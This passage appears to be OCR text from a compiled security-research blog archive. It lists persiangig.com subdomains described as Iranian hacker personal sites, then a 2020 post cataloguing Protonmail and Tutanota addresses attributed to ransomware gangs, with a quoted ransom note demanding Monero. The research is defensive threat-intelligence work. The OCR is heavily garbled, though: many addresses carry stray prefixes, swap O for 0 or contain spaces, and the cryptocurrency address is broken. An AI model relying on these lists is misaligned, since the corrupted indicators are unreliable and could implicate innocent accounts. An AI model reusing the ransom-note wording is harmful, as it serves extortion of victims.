https://named-qcc.persiangig.com/ 


https://namedanno.persiangig.com/ 


8681 


https://namedweb.persiangig.com/ 
https://hamid-xsky.persiangig.com/ 
https://namidsari.persiangig.com/ 
https://nhamidsos3.persiangig.com/ 
https://namidvirusi.persiangig.com/ 
https://hamidzip.persiangig.com/ 
https://hamix2x.persiangig.com/ 
https://hck-tools.persiangig.com/ 
https://ncthemep.persiangig.com/ 
https://nheavenly-boys.persiangig.com/ 
https://nebou.persiangig.com/ 
https://hellgatel.persiangig.com/ 
https://nesam4u.persiangig.com/ 
https://hfarchive.persiangig.com/ 
https://hivO000.persiangig.com/ 
https://hkingsoftware.persiangig.com/ 
https://nhogwartsschool.persiangig.com/ 
https://nomanmh95.persiangig.com/ 
https://www.homepage.ht/ 
https://honey24.persiangig.com/ 
https://hoseeinO.persiangig.com/ 
https://hotweb24.persiangig.com/ 
https://nunterprogs.persiangig.com/ 
https://iZ0oter.persiangig.com/ 
https://iman2sh.persiangig.com/ 
https://imperial2008.persiangig.com/ 
https://impostor-76171.persiangig.com/ 
https://impostor.persiangig.com/ 
https://infohooman.persiangig.com/ 
https://infology2.persiangig.com/ 
https://iqbala.persiangig.com/ 
https://ir2hak.persiangig.com/ 
https://iran-hacker.persiangig.com/ 
https://iran-pc.persiangig.com/ 
https://iran30download.persiangig.com/ 
8682 


https://iranexe.persiangig.com/ 
https://irmessanger.persiangig.com/ 
https://irsdl.persiangig.com/ 
https://iscst.persiangig.com/ 
https://iseeu7.persiangig.com/ 
https://it-tab.persiangig.com/ 
https://jOOmjOOme.persiangig.com/ 
https://jaber.persiangig.com/ 
https://jahanseir.persiangig.com/ 
https://jasoo30.persiangig.com/ 
https://jbvss.persiangig.com/ 
https://jetvpn.persiangig.com/ 
https://joker12.persiangig.com/ 
https://jsut2dl.persiangig.com/ 
https://juventus2020.persiangig.com/ 
https://k0242.persiangig.com/ 
https://kaave.persiangig.com/ 
https://kapakha3.persiangig.com/ 
https://karetbist.persiangig.com/ 
https://karim-sbs.persiangig.com/ 
https://katriana.persiangig.com/ 
https://kaveh0817.persiangig.com/ 
https://kaziiak.persiangig.com/ 
https://keylogger.persiangig.com/ 
https://khafanpatogh.persiangig.com/ 
https://khajavi0622.persiangig.com/ 
https://khashi.persiangig.com/ 
https://khI32.persiangig.com/ 
https://khosin.persiangig.com/ 
https://kiandew.persiangig.com/ 
https://kianescence.persiangig.com/ 
https://kiarashmm.persiangig.com/ 
https://kifabi.persiangig.com/ 
https://kingq8.persiangig.com/ 
https://kitten2.persiangig.com/ 


8683 


https://kohsalar.persiangig.com/ 
https://kolahsefid.persiangig.com/ 
https://kolx132.persiangig.com/ 
https://komil88.persiangig.com/ 
https://kookhneshinan.persiangig.com/ 
https://korosh-05.persiangig.com/ 
https://krylack.ultimate.keylogger.pro/ 
https://lOrdOfh3ll.persiangig.com/ 
https://lahij.persiangig.com/ 
https://Ibclive.persiangig.com/ 
https://li-tex11.persiangig.com/ 
https://lightwolf.persiangig.com/ 
https://livesos.persiangig.com/ 
https://Inbmitnick.persiangig.com/ 
https://lord-pc.persiangig.com/ 
https://loveemperor.persiangig.com/ 
https://loving.persiangig.com/ 
https://m-nasr.persiangig.com/ 
https://M1998.persiangig.com/ 
https://m9macl.persiangig.com/ 
https://mahallatnews.persiangig.com/ 
https://mahallatonlinefiles.persiangig.com/ 
https://mahdi10.persiangig.com/ 
https://mahdi1l575.persiangig.com/ 
https://mahdiheidari.persiangig.com/ 
https://mahdiizadi.persiangig.com/ 
https://mahdiniknam.persiangig.com/ 
https://majid-138.persiangig.com/ 
https://majid0919.persiangig.com/ 
https://majidshirazy.persiangig.com/ 
https://makan.persiangig.com/ 
https://mamadnopm.persiangig.com/ 
https://mamalinternet.persiangig.com/ 
https://mammadcpu.persiangig.com/ 
https://marshal-doc.persiangig.com/ 
8684 


https://marvdasht.persiangig.com/ 
https://maryamsadeghi1372.persiangig.com/ 
https://masterdll.persiangig.com/ 
https://masterjoint.persiangig.com/ 
https://masterss.persiangig.com/ 
https://mayanet.persiangig.com/ 
https://mazaghine.persiangig.com/ 
https://mehd1.persiangig.com/ 
https://mehdi456.persiangig.com/ 
https://mehdibahadori.persiangig.com/ 
https://mehdioffflone.persiangig.com/ 
https://mehran4u.persiangig.com/ 
https://mellat.persiangig.com/ 
https://mhm5000.persiangig.com/ 
https://mihanp30.persiangig.com/ 
https://mihansystem.persiangig.com/ 
https://milad-gh.persiangig.com/ 
https://milad69.persiangig.com/ 
https://miladesfanji.persiangig.com/ 
https://milytexas.persiangig.com/ 
https://minasiyan.persiangig.com/ 
https://mintegaro.persiangig.com/ 
https://mionel.persiangig.com/ 
https://mj2008.persiangig.com/ 
https://moghi.persiangig.com/ 
https://mohamadizadeh.persiangig.com/ 
https://mohammad-safari696.persiangig.com/ 
https://mohammad912.persiangig.com/ 
https://mohammadbonvari.persiangig.com/ 
https://mojinet.persiangig.com/ 
https://mojt3b3.persiangig.com/ 
https://mojtaba136.persiangig.com/ 
https://molex.persiangig.com/ 
https://moresecurity.persiangig.com/ 


https://mortalkombat.persiangig.com/ 


8685 


https://mortezahabibi.persiangig.com/ 
https://motakhases.persiangig.com/ 
https://mp4all.persiangig.com/ 
https://mpk2119.persiangig.com/ 
https://mraria.persiangig.com/ 
https://mrjack.persiangig.com/ 
https://mrpayne.persiangig.com/ 
https://msn-smith.persiangig.com/ 
https://mutemove.persiangig.com/ 
https://myways.persiangig.com/ 
https://nanorayane.persiangig.com/ 
https://narmafzar28.persiangig.com/ 
https://naserjan.persiangig.com/ 
https://navid-b-2012.persiangig.com/ 
https://nefratbooter.persiangig.com/ 
https://nemesis-0131.persiangig.com/ 
https://networktools.persiangig.com/ 
https://newblack.persiangig.com/ 
https://nima3.persiangig.com/ 
https://nimetal.persiangig.com/ 
https://noktehaa.persiangig.com/ 
https://noofoz.persiangig.com/ 
https://nova-team.persiangig.com/ 
https://omid-niazi.persiangig.com/ 
https://omid-pich.persiangig.com/ 
https://omid-shakh.persiangig.com/ 
https://omid69.persiangig.com/ 
https://only-amniat.persiangig.com/ 
https://onlykdk.persiangig.com/ 
https://orum-0441.persiangig.com/ 
https://oshamid.persiangig.com/ 
https://p-h-s-t.persiangig.com/ 
https://p30cloob.persiangig.com/ 
https://p30man2008.persiangig.com/ 
https://p30shopcenter.persiangig.com/ 
8686 


https://p40-10.persiangig.com/ 
https://pack-blogfa-com.persiangig.com/ 
https://padad.persiangig.com/ 
https://paeez2012.persiangig.com/ 
https://pakota1000.persiangig.com/ 
https://paksal.persiangig.com/ 
https://panjsaher5.persiangig.com/ 
https://par30site.persiangig.com/ 
https://parandrayaneh.persiangig.com/ 
https://parazitwOrm.persiangig.com/ 
https://parsi.persiangig.com/ 
https://patoghma.persiangig.com/ 
https://payamjv.persiangig.com/ 
https://persianbackyard.persiangig.com/ 
https://persianfurom.persiangig.com/ 
https://persianhw.persiangig.com/ 
https://persiantnt.persiangig.com/ 
https://peymanjahanbakhsh.persiangig.com/ 
https://pichpichak-speed.persiangig.com/ 
https://pick-sub-ir.persiangig.com/ 
https://pishiman.persiangig.com/ 
https://pkmax.persiangig.com/ 
https://planetworld.persiangig.com/ 
https://omf0918.persiangig.com/ 
https://pnrbayati.persiangig.com/ 
https://pooyanse2.persiangig.com/ 
https://port80.persiangig.com/ 
https://pouya2006.persiangig.com/ 
https://prime.persiangig.com/ 
https://prognet.persiangig.com/ 
https://programmers-9893.persiangig.com/ 
https://punisherr.persiangig.com/ 
https://pzr23.persiangig.com/ 
https://qwertyuiopasdfghjkl.persiangig.com/ 
https://ramin-rock.persiangig.com/ 


8687 


https://raminO.persiangig.com/ 
https://raminmj18.persiangig.com/ 
https://raperhal.persiangig.com/ 
https://rashterror.persiangig.com/ 
https://ravanbakhsh.persiangig.com/ 
https://rayanmehr.persiangig.com/ 
https://raykagorgani.persiangig.com/ 
https://rexona-dl.persiangig.com/ 
https://reza-eblicen.persiangig.com/ 
https://rezabs.persiangig.com/ 
https://rgb4you.persiangig.com/ 
https://rohullahalawi.persiangig.com/ 
https://rommy.persiangig.com/ 
https://rz04a.persiangig.com/ 
https://s3v3n.persiangig.com/ 
https://saber74.persiangig.com/ 
https://saeid70.persiangig.com/ 
https://sajjadkhafan.persiangig.com/ 
https://sakhi.persiangig.com/ 
https://saman034.persiangig.com/ 
https://samiragol.persiangig.com/ 
https://sarani0718.persiangig.com/ 
https://satan1.persiangig.com/ 
https://satanic.persiangig.com/ 
https://satanicboot.persiangig.com/ 
https://scorpion2.persiangig.com/ 
https://sepidehdam.persiangig.com/ 
https://seyyedrasoul.persiangig.com/ 
https://sezar.persiangig.com/ 
https://sh3karchi.persiangig.com/ 
https://sh4dows-king.persiangig.com/ 
https://shamal.persiangig.com/ 
https://sheidaian.persianblog.ht/ 
https://sheikhoo.persiangig.com/ 
https://sidel32.persiangig.com/ 
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https://sir4r4sh3rr0r.persiangig.com/ 
https://slate.persiangig.com/ 
https://softme.persiangig.com/ 
https://soltanhoseyn.persiangig.com/ 
https://someone.persiangig.com/ 
https://sonyeric.persiangig.com/ 
https://source-planet.persiangig.com/ 
https://spthapali.persiangig.com/ 
https://spyftp.persiangig.com/ 
https://sun2rise.persiangig.com/ 
https://system2009.persiangig.com/ 
https://t-danlod.persiangig.com/ 
https://tabriz118.persiangig.com/ 
https://takfanar.persiangig.com/ 
https://takp30them4.persiangig.com/ 
https://tanhadarshab2.persiangig.com/ 
https://tanhaeshgh71.persiangig.com/ 
https://tanhastrife.persiangig.com/ 
https://themist.persiangig.com/ 
https://torbat-h.persiangig.com/ 
https://tornado20.persiangig.com/ 
https://turkhackers.persiangig.com/ 
https://uh12uh12.persiangig.com/ 
https://under-world.persiangig.com/ 
https://unknOwn72.persiangig.com/ 
https://upload-ekrami.persiangig.com/ 
https://upload2020.persiangig.com/ 
https://upload4u.persiangig.com/ 
https://uploadh.persiangig.com/ 
https://uploadr.persiangig.com/ 
https://urmiatheme.persiangig.com/ 
https://v4hid.persiangig.com/ 
https://vahid-master.persiangig.com/ 
https://vahidsistem.persiangig.com/ 


https://vomahdi2009.persiangig.com/ 
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https://vibox.persiangig.com/ 
https://vvolf.persiangig.com/ 
https://web-pc-training.persiangig.com/ 
https://xsky.persiangig.com/ 

Stay tuned! 


1. https://1.bp. blogspot .com/-7f£XJFN65Y08/X5q3heqeYcI/AAAAAAAALL8/80aDAB1g1PIA81pWkq0ZCvpe86_-UsbjACLcBGASYHQ 
s263/Iran_Hackers_Personal_Web_Sites_Repository. jpg 


2. https: //unit-123.org/wp-content/uploads/2020/05/Dancho_Danchev_Analysis_Report_Iran_Hacking Scene.ra 


3. https://dl.packetstormsecurity.net/papers/general/Iran.ra 


4. https://unit-123.org/wp-content/uploads/2020/10/Iran_Hackers_Personal_Web_Sites_Repository.ra 


5. https: //unit-123.org/wp-content/uploads/2020/10/Iran_Hackers_Personal_Web_Sites_Repository_O1.ra 


16.9 November 


16.9.1 Exposing Protonmail and Tutanota’s Illicit Abuse by Ransomware Gangs - 
A Compilation of Currently Active Ransomware-Themed Email Addresses 
(2020-11-08 11:04) 


[1] 


If you close this window, you can always restart and it should appear again. 


All your files have been encrypted by us. This means you will be unable to access or use 

them. In order to retrieve them, you must send 0.3 monero (about $120 USD) to: 

46F XmRvyffuS9NNUs95rHx5cVQqU2z222QD5qP 7wY fDiGaGjBGtP 7cfSEhaQ 1 qy7waqV7bcNnrNUf2n 1 gugrOmKPG8U6AqHwy 
Make sure you include your payment ID: EERizievekirsEat: 

Use CTRL+C to copy both 

IF YOU DO NOT INCLUDE YOUR PAYMENT ID, YOUR FILES CANNOT BE DECRYPTED. Do not 


waste your time -- only we can decrypt your files. 


If you have paid, click on the DECRYPT button to return your files to normal. Don't worry, we'll give you 


your files back if you pay. 


Ea 


UPDATE: ProtonMail and Tutanota removed all the accounts. 


Dear blog readers, 
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I’ve recently decided to update and expand my original post on currently active email 
addresses used by [2]ransomware gangs and DIY ransomware users with an additional set of 
Protonmail and Tutanota accounts which | believe should be taken offline as soon as possible 
in an attempt to disrupt the rogue and fraudulent operations currently run and managed by 
these groups and users. 


Grab a copy of all the currently active Protonmail accounts used by ransomware gangs and 
lone DIY ransomware users from [3]here including all the currently active Tutanota email 
accounts used by ransomware gangs from [4]here including the complete and recently 
updated of all the publicly accessible email address accounts currently in circulation and used 
by [5]ransomware gangs including DIY ransomware users from [6]here. 


Sample portfolio of currently active Protonmail accounts used by ransomware gangs and 
DIY ransomware users: 


anony.killers@protonmail.com 
avrahamblanck@protonmail.com 
brazilianl10@protonmail.com 
business2018@protonmail.com 
cashfalse777@protonmail.com 
China2.0t@protonmail.com 
gamebred812@protonmail.com 
goodbuyer777@protonmail.com 
goodcOder@protonmail.com 
iamhiddenroot@protonmail.com 
irc.priv8@protonmail.com 
johnnada2018@protonmail.com 
lider2018@protonmail.com 
marksullivandata@protonmail.com 
milanhendriks35@protonmail.com 
murygroup@protonmail.com 
premacz@protonmail.com 
pryOcc@protonmail.com 
reverzed@protonmail.com 
sababal5@protonmail.com 
sagatyk@protonmail.com 
Secureworks0093@protonmail.com 
sharkpoison@protonmail.com 
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sphelp23565@protonmail.com 
tactical _toast@protonmail.com 
tr4ceflOw@protonmail.com 
vefinvlad18@protonmail.com 
verbO0@protonmail.com 
aihlp@protonmail.com 
servicedeskpay@protonmail.com 
ooosferaplus@protonmail.com 
debugs@protonmail.com 
Vegas MOZ6@protonmail.com 
pepsi666@protonmail.com 
deblans@protonmail.com 
forestt@protonmail.com 

heslo _1@protonmail.com 
mp35@protonmail.com 
skpayment@protonmail.com 
skypayment@protonmail.com 
bitcharity@protonmail.com 
ctatmulfite@protonmail.com 
bleeparity@protonmail.com 
altairs35@protonmail.com 
adm15@protonmail.com 
mstr.hacker@protonmail.com 
keeky@protonmail.com 
thebest777@protonmail.ch 
Harmahelp73@protonmail.com 
vip76@protonmail.com 
testfilel@protonmail.com 
wang.chang.team.888@protonmail.com 
MrRDX@protonmail.com 
fooox1@protonmail.com 
000x1@protonmail.com 
Panzergen552@protonmail.com 
filesreturn247@protonmail.com 


hidebak@protonmail.com 
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com-gloria@protonmail.com 
upfileme@protonmail.com 
cleverhorse@protonmail.com 
Keta990@protonmail.com 
Quantroei@protonmail.com 
sailormorgan@protonmail.com 
friends2019@protonmail.com 
back ins@protonmail.ch 
bbitcrypt@protonmail.com 
files2@protonmail.com 
kickclakus@protonmail.com 
decrypt.russ@protonmail.com 
Hichkasam@protonmail.com 
helpdiamond@protonmail.com 
BrillianceBK@protonmail.com 
LizardBkup@protonmail.com 
decoderma@protonmail.com 
missdecryptor@protonmail.com 
VoidFiles@protonmail.com 
Pentagon11@protonmail.com 
guaranteedsupport@protonmail.com 
decrypterfile@protonmail.com 
rsaencrypt@protonmail.ch 
burgeer@protonmail.ch 
lrestOre@protonmail.com 
nlrestOre@protonmail.com 
nservo99@protonmail.com 
nservo33@protonmail.com 
Oktropys@protonmail.com 
tr.pashra@protonmail.ch 
delonethunder@protonmail.com 
20.cashdashsentme@protonmail.com 
20.coder007@protonmail.com 
20.coronaVi2022@protonmail.ch 


20Yourencrypter@protonmail.ch 
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der. Yourencrypter@protonmail.ch 
20.supportfiless24@protonmail.ch 
Olivier92747@protonmail.com 
normanzak@protonmail.com 
20.worcservice@protonmail.ch 
20.aztecdecrypt@protonmail.com 
CatSexy@protonmail.com 
20Recuperadados@protonmail.com 
teamv@protonmail.com 
retourneren247@protonmail.com 
e-DecryptFox@protonmail.com 
frasesitliter1981@protonmail.com 
ways. Yourencrypter@protonmail.ch 
nemail2 _zuza@protonmail.com 
ndalailama2015@protonmail.ch 
nVenisRansom@protonmail.com 
nzikr@protonmail.com 
nzikra@protonmail.com 
nSanta-helper@protonmail.com 
njschweiz@protonmail.ch 
naes-ni@protonmail.com 
nalka@protonmail.com 
n0xc030@protonmail.ch 
nTizer77234@protonmail.com 
nFilegorillal388@protonmail.com 
nPec.clean@protonmail.com 
natlantis _cf@protonmail.com 
nExte2@protonmail.com 
nunickr@protonmail.com 
nfbifine@protonmail.com 
nerrorO3@protonmail.com 
nEmpty003@protonmail.com 
nx1881@protonmail.com 
ndd.coala@protonmail.com 
ncrypto7892@protonmail.com 
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nMastersRecovery@protonmail.com 
ndie _yourself@protonmail.com 
nsigrun _decryptor@protonmail.ch 
nBackuppc@protonmail.com 
nBackuppcl1@protonmail.com 
nDiskDoctor@protonmail.com 
noktropys@protonmail.com 
njOra@protonmail.com 
nFilesreturn247@protonmail.com 
nPabFox@protonmail.com 
nMelisaPeterman@protonmail.com 
ncrab7765@protonmail.com 
ndecoder-help@protonmail.com 
naperfectday2018@protonmail.com 
nincognitoman@protonmail.com 
nyougame@protonmail.ch 
nibfosontsing@protonmail.com 
nTerminator _123@protonmail.com 
nnostrol19@protonmail.com 
ndecryptOr-help@protonmail.com 
ncrab1917@protonmail.com 
nCottleAkela@protonmail.com 
nnomoreletters@protonmail.ch 
nservicedigilogos@protonmail.com 
ncammoral9@protonmail.com 
ndarkusmbackup@protonmail.com 
nRobSmithMba@protonmail.com 
nbivisfiles@protonmail.com 
nzoro4747@protonmail.com 
nrecoverymydata@protonmail.com 
nDecryptcn@protonmail.ch 
nshelbyboom@protonmail.com 
n0301192293@protonmail.com 
ndatahelper@protonmail.com 


neladovinl1975@protonmail.com 
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nHelp557@protonmail.com 
nyou.help5@protonmail.com 
n4shadow@protonmail.com 
ndawndec001@protonmail.com 
nDecryptFs@protonmail.com 
nlafoievologjaninl23@protonmail.com 
ndecoder83540@protonmail.com 
nfilelL@protonmail.com 
naireyeric@protonmail.com 
nellershaw.kiley@protonmail.com 
nslanson _street8@protonmail.com 
nParadiseconnect@protonmail.com 
nzeoticus@protonmail.com 
tbillwong73@protonmail.com 
nasgardmaster5@protonmail.com 
nfahydremu1981@protonmail.com 
nbest666decoder@protonmail.com 
nrazor2020@protonmail.ch 
nvinilblind@protonmail.com 
nmalieholtan@protonmail.com 
nnormanzak@protonmail.com 

ndec _restore@protonmail.com 
uffla52pojie _mail@protonmail.com 
nSilentDeathDecryptor@protonmail.com 
nOlivier92747@protonmail.com 
nJamesBaker78@protonmail.com 
nMayth24@protonmail.com 
ufflaitunes decrypt@protonmail.com 
nAdamBrown89@protonmail.com 
nFridaFarko@protonmail.com 
nphrasitliter1981@protonmail.com 
nguifullchartill1970@protonmail.com 
nSidmouleux996@protonmail.com 
CCD-help@protonmail.ch 
yourfile2020@protonmail.com 
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saturndayc@protonmail.com 
deloneThunder@protonmail.com 
SmartDen@protonmail.com 
encryptor2020@protonmail.com 
nOprOblems@protonmail.com 
leakthemall@protonmail.com 
fiasco911@protonmail.com 
cryptonationusa@protonmail.com 
andrey.taranov@protonmail.com 
admincrypt@protonmail.com 
help.me24@protonmail.com 
symetrikk@protonmail.com 
metron28@protonmail.com 
decyourdata@protonmail.com 
ransOme@protonmail.com 
Unlock11@protonmail.com 
erica2020@protonmail.com 
777decoder777@protonmail.com 
n777decoder777@protonmail.com 
nAskHelp@protonmail.com 
stevemartin777@protonmail.com 
npr0t3eam@protonmail.com 
anenerbex@protonmail.com 
nanenerbex@protonmail.com 
azor2020@protonmail.ch 
Buddy888@protonmail.com 
paymebtc@protonmail.com 
backbigdata@protonmail.com 
getdecoding@protonmail.com 
recovery _server@protonmail.com 
nrecovery server@protonmail.com 
recoverydbservice@protonmail.com 
nrecoverydbservice@protonmail.com 
nlrestOre@protonmail.com 


nCobra _Locker@protonmail.com 
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nBatHelp@protonmail.com 
nFolieloi@protonmail.com 
nsuppdecrypt@protonmail.com 
decryptionl@protonmail.com 
deccrypasia@protonmail.com 
decrypt019@protonmail.com 
diller13@protonmail.com 
ndecrypt019@protonmail.com 
decphob@protonmail.com 
CryptoLocky _123456@protonmail.com 
imperial755@protonmail.com 
hitsbtc@protonmail.com 
nRecoverybat@protonmail.com 
geneve010@protonmail.com 
geneve020@protonmail.com 
ngeneve010@protonmail.com 
ngeneve020@protonmail.com 
GiveMeTheKey@protonmail.com 
encryptor996@protonmail.com 
ripntfs@protonmail.com 
hlpp2@protonmail.com 
nWuTang444@protonmail.com 
nleakthemall@protonmail.com 
lolyta restore@protonmail.ch 
decode.help@protonmail.ch 
n0x69x@protonmail.com 
nmiddleman2020@protonmail.com 
greemsy.jj@protonmail.ch 
ZiCoyote@protonmail.com 
MarkTrue88@protonmail.com 
myphoto.jpg.nefartanulo@protonmail.com 
njamesgonzaleswork1972@protonmail.com 
Deanlivermore@protonmail.com 
nDeanlivermore@protonmail.com 


repairhostl1@protonmail.com 
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nrepairhostl@protonmail.com 
nxvfxgw3929@protonmail.com 
nalanson _street8@protonmail.com 
nlambchristoffer@protonmail.com 
qhrghghk@protonmail.com 
nqhrghghk@protonmail.com 
Ragnarok _master@protonmail.com 
nRagnarok _master@protonmail.com 
nunlockmeplease@protonmail.com 
filedownload2020@protonmail.com 
helpcov19@protonmail.com 
black8201@protonmail.com 
RDPrecovery1@protonmail.com 


sifremicoz@protonmail.com 


nDineshSchwartz1965@protonmail.com 
nRupertMariner1958@protonmail.com 


nStephanForenzzo1985@protonmail.com 


SantaGman22@protonmail.com 
nEdsonEpsok@protonmail.com 
nAlfredhormund@protonmail.com 
recoba90@protonmail.com 
TomSoyer5@protonmail.com 
reservedecryption@protonmail.com 
TentwenUpperl@protonmail.com 
locksvbox@protonmail.com 
xtredboy@protonmail.com 
Encryptedxtredboy@protonmail.com 
addwe@protonmail.com 
SupportC14@protonmail.ch 
ReftuOne@protonmail.com 
ransom12344@protonmail.com 
nransom12344@protonmail.com 
xmrlocker@protonmail.ch 
nxmrlocker@protonmail.ch 


zorab28@protonmail.com 
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zynoxion@protonmail.com 
crossroads2371@protonmail.ch 
mailsupp@protonmail.com 
FridaFark@protonmail.com 
Cryptofiles20202020@protonmail.com 
TaiLung@protonmail.com 

chine jm@protonmail.ch 
crptcloud@protonmail.ch 
LaoXinWon@protonmail.com 
tinxony@protonmail.com 
veritablebee@protonmail.ch 
corpseworm@protonmail.com 
backmydata@protonmail.com 
crioso@protonmail.com 
recover1l3@protonmail.com 
bucheck@protonmail.com 
decrypttos@protonmail.com 
EMAIL-MREncptor@protonmail.com 
Ooosferaplus@protonmail.com 
freefoams@protonmail.com 

1_kill_ yourself 1@protonmail.com 
Look1213@protonmail.com 
BTCBREWERY@protonmail.com 
bitcharity@protonmail.com.com 
deltatechit@protonmail.com 
teamvi@protonmail.com 
guifullchartil970@protonmail.com 
Reycarnasi1983@protonmail.com 
XPReycarnasil983@protonmail.com 
Aztecdecrypt@protonmail.com 
Cooolme@protonmail.com 
Checkmail7@protonmail.com 
Ssananunak1987@protonmail.com 
Kromber@protonmail.com 
tanoss@protonmail.ch 
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fedoremelianenko1976@protonmail.com 
CharlstonParkwji@protonmail.com 
zagrec@protonmail.com 
teamvv@protonmail.com 
recoverysq|@protonmail.com 
agent.dmr@protonmail.com 
raynorzlol@protonmail.com 
apoyo2019@protonmail.com 
backcompanyfiles@protonmail.com 
established01@protonmail.com 
hjelp.main@protonmail.com 

angry _war@protonmail.ch 

cheetOs de@protonmail.com 
Pringls us@protonmail.com 

happy _sysadmin@protonmail.ch 
anfreesextuol982@protonmail.com 
nanfreesextuo1982@protonmail.com 
rsal024rsa@protonmail.ch 
pay4netwww@protonmail.com 
GAmmA37@protonmail.ch 
Bit-decrypt@protonmail.com 
AleksanderEmelianenko@protonmail.com 
cyberunionn@protonmail.com 
MREncptor@protonmail.com 
decryptsupport@protonmail.com 
shine2@protonmail.com 

recover 24 7@protonmail.com 
neural.net2@protonmail.com 
charlies9090@protonmail.com 
cryptmanager@protonmail.com 
remoteav@protonmail.ch 
servo99@protonmail.com 
servo33@protonmail.com 
gtimph@protonmail.com 


Steven77xx@protonmail.com 
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wecanhelp2@protonmail.com 
yOO000@protonmail.com 
braln@protonmail.com 
backuppc@protonmail.com 
backuppcl@protonmail.com 
decryptmystuff@protonmail.com 
decrypthelpfiles@protonmail.com 
executioner.update@protonmail.com 
exte2@protonmail.com 
file-spider@protonmail.ch 
filefrozr@protonmail.com 
1173022@protonmail.com 
stysla@protonmail.com 
hakbit@protonmail.com 
egenexphi1988@protonmail.com 
johnsonwhate@protonmail.com 
CottleAkela@protonmail.com 
walker18@protonmail.ch 
solutionshelp@protonmail.com 
edgar4000@protonmail.com 
support-hack@protonmail.com 
sicck@protonmail.com 
Skull.and.bones2017@protonmail.com 
simmyware@protonmail.ch 
tbhranso@protonmail.com 
fileo@protonmail.com 
helpmegetfiles@protonmail.com 
jokeroo@protonmail.com 
grethen@protonmail.ch 
luboversoval48@protonmail.com 
getwindows@protonmail.com 
u2018grethen@protonmail.ch 
u00a0coronaVi2022@protonmail.ch 
u2018wannacry.decryptor v4@protonmail.com 
PedantBack@protonmail.com 

8702 


abibo@protonmail.com 
CryTekk@protonmail.com 
sydney.wiley@protonmail.com 
suupport@protonmail.com 
serverup@protonmail.com 
ivanmalahov@protonmail.com 
rusoftfond@protonmail.com 
g.kulahmet@protonmail.com 
russian@protonmail.com 
zoye596@protonmail.com 

AES _KEY GEN _ASSIST@protonmail.com 
anoncrack@protonmail.com 
ransomrust@protonmail.com 
Big80bRoss@protonmail.com 
ClaudiaBarnengham@protonmail.com 
johhnyNicko926-2w7@protonmail.ru 
support _config@protonmail.com 
3bitcoins@protonmail.com 
decrypter@protonmail.ch 
polssh1@protonmail.com 
polssh@protonmail.com 
annali1984@protonmail.com 
Cammoral9@protonmail.com 
johnbell27294@protonmail.ru 
filelocker@protonmail.ch 
grion@protonmail.com 
kensgiloomet@protonmail.com 
icarsole@protonmail.com 
antnony.blackmer@protonmail.com 
bactocepnyou@protonmail.com 
juccy@protonmail.ch 
omegawatch@protonmail.com 
Recoverhelp@protonmail.ch 
email@protonmail.com 


pay.ransom@protonmail.com 
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errorout@protonmail.com 
empty003@protonmail.com 
test757@protonmail.com 
ck03@protonmail.com 
dg01@protonmail.com 
cnc0O3@protonmail.com 
DejackomeAjna@protonmail.com 
CyberSCCP@protonmail.com 
billy will help you@protonmail.com 
DecryptFox@protonmail.com 
decryptiomega@protonmail.com 
MotoxLocker2016@protonmail.com 
Ixhlp2@protonmail.com 
FobosAmerika@protonmail.ch 
Inq@protonmail.com 
EncodeMan@protonmail.com 
erica _files@protonmail.com 
freefoam@protonmail.com 
unhappymalware@protonmail.com 
confirmprotect@protonmail.com 
forGarryweber@protonmail.ch 
oceannew _vb@protonmail.com 
laborotoria@protonmail.ch 
fileredeemer@protonmail.com 
laboratoria@protonmail.ch 

file free@protonmail.com 
tru8@protonmail.com 
godra@protonmail.com 
johnsmith965856@protonmail.ru 
encryptor1996@protonmail.com 
RdpLock@protonmail.com 
hatmatdat@protonmail.com 
cryptOrl@protonmail.com 
aroshany@protonmail.com 
Sansatsuo@protonmail.com 
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Unlock96@protonmail.com 
hmdjam@protonmail.com 
dorejadid1@protonmail.com 
encryptionl1996@protonmail.com 
payment.hkdecryp@protonmail.com 
letgetyourfileback@protonmail.com 
SARAH.BARRICK@protonmail.com 
a9gfa9gh@protonmail.com 
my-contact-email@protonmail.com 
neitrino@protonmail.com 
mr.anders@protonmail.com 
DharmaParrack@protonmail.com 
LockMecQqL3Ruy7VORfZ@protonmail.com 
XXXXXX@protonmail.com 
bmps@protonmail.com 
rootcopper@protonmail.com 
KILLYOUASS@protonmail.com 
restoring.data@protonmail.com 
farik1@protonmail.com 
admcphel@protonmail.ch 
gianttl1@protonmail.com 
data.compromised@protonmail.com 
ww6666@protonmail.com 

helpdesk _makp@protonmail.ch 
citrix2234@protonmail.com 
FastBob@protonmail.com 
mdk4y@protonmail.com 
mckie31@protonmail.com 
gareth.mckie31@protonmail.com 
gaetano.olsen@protonmail.com 
dbbackups@protonmail.com 
asist.help@protonmail.com 
mr.file@protonmail.com 
localgroup@protonmail.com 


splax1425@protonmail.com 
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bigbobross@protonmail.com 
bliviondecrypt@protonmail.com 
Filedecryptor@protonmail.com 
honeylock@protonmail.com 
Mr.TeslaBrain@protonmail.com 
AdvancedBackup@protonmail.com 
recover85@protonmail.com 
unlock0101@protonmail.com 
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getscoin2@protonmail.com 
TimisoaraHackerleam@protonmail.com 
my _balancebit@protonmail.com 
wannacry.decryptor _v4@protonmail.com 
iknowyouandiseeyou@protonmail.ch 

MR _Liosion@protonmail.com 
jacksparrow@protonmail.com 
helips@protonmail.com 
0xc030@protonmail.ch 
aes-ni@protonmail.com 
AskHelp@protonmail.com 
atlashelp@protonmail.com 
atlasfix@protonmail.com 
ssananunak1987@protonmail.com 
bronmerkberpal976@protonmail.com 
Backuppc@protonmail.com 
Backuppc1@protonmail.com 
barracudahelp@protonmail.com 

atlantis _cf@protonmail.com 
fmhir@protonmail.com 
eula.2052.txt.coder007@protonmail.com 
install.exe.coderO07@protonmail.com 
money.doc.coder007@protonmail.com 
TagFile S.txt.coder007@protonmail.com 
vcredist.bmp.coder007@protonmail.com 
python.exe.coder007@protonmail.com 
python2.7.exe.coder007@protonmail.com 
python2.exe.coder007@protonmail.com 
BatHelp@protonmail.com 
crab7765@protonmail.com 
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cryptghOst@protonmail.com 
crypto7892@protonmail.com 
anticrypto@protonmail.com 
decoder-help@protonmail.com 
Slanler111@protonmail.com 
excuses@protonmail.com 
execute@protonmail.com 
filel@protonmail.com 
Filesreturn247@protonmail.com 
gluttonBD@protonmail.com 
Inq@protonmail.com 
hiddentear@protonmail.com 
paymifordecrypt@protonmail.ch 
InfiniteDecryptor@protonmail.com 
kts2018@protonmail.com 
key-support@protonmail.com 
error-crypt@protonmail.com 
king.ouroboros@protonmail.com 
kvlly@protonmail.ch 
mr.leen@protonmail.com 
blackgoldI23@protonmail.com 
xaodecrypt@protonmail.com 
qnbqwqe@protonmail.com 
alka@protonmail.com 
westlan@protonmail.ch 
